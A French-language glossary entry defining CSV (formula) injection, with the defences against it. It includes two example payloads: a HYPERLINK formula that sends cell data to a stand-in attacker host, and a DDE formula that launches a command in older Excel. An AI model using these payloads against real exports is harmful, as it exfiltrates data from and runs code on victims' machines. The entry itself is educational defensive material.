Injection CSV
Qu'est-ce que Injection CSV ?
Injection CSVAttaque qui insère des formules de tableur dans des fichiers CSV exportés, de sorte qu'ouvrir le fichier dans Excel ou Sheets exécute des actions contrôlées par l'attaquant.
L'injection CSV, parfois appelée injection de formules, exploite les tableurs qui évaluent automatiquement les cellules commençant par =, +, -, @, une tabulation ou un retour chariot. Lorsqu'une application web stocke une entrée de l'attaquant puis l'exporte en CSV, le classeur résultant peut déclencher DDE, contacter des URL distantes, exfiltrer des données ou déposer un logiciel malveillant à l'ouverture. Le risque réside chez le consommateur du fichier, pas dans la base de données, ce qui le rend facile à manquer en revue de code. Les défenses consistent à préfixer toute cellule commençant par un caractère dangereux par une apostrophe ou un autre préfixe sûr, à valider et échapper les champs avant export et à avertir les utilisateurs avant d'ouvrir des feuilles non fiables.
● Exemples
- 01
Un formulaire de contact dont le champ Nom accepte =HYPERLINK("https://attaquant.example/?l="&A2,"Clic") et exfiltre d'autres cellules à l'ouverture de l'export.
- 02
Un rapport CRM exporté contenant =cmd|'/c calc'!A1 qui déclenche le DDE dans d'anciennes versions d'Excel.
● Questions fréquentes
Qu'est-ce que Injection CSV ?
Attaque qui insère des formules de tableur dans des fichiers CSV exportés, de sorte qu'ouvrir le fichier dans Excel ou Sheets exécute des actions contrôlées par l'attaquant. Cette notion relève de la catégorie Attaques et menaces en cybersécurité.
Que signifie Injection CSV ?
Attaque qui insère des formules de tableur dans des fichiers CSV exportés, de sorte qu'ouvrir le fichier dans Excel ou Sheets exécute des actions contrôlées par l'attaquant.
Comment se défendre contre Injection CSV ?
Les défenses contre Injection CSV combinent habituellement des contrôles techniques et des pratiques opérationnelles, comme détaillé dans la définition ci-dessus.
Quels sont les autres noms de Injection CSV ?
Noms alternatifs courants : Injection de formules, Injection de macros Excel.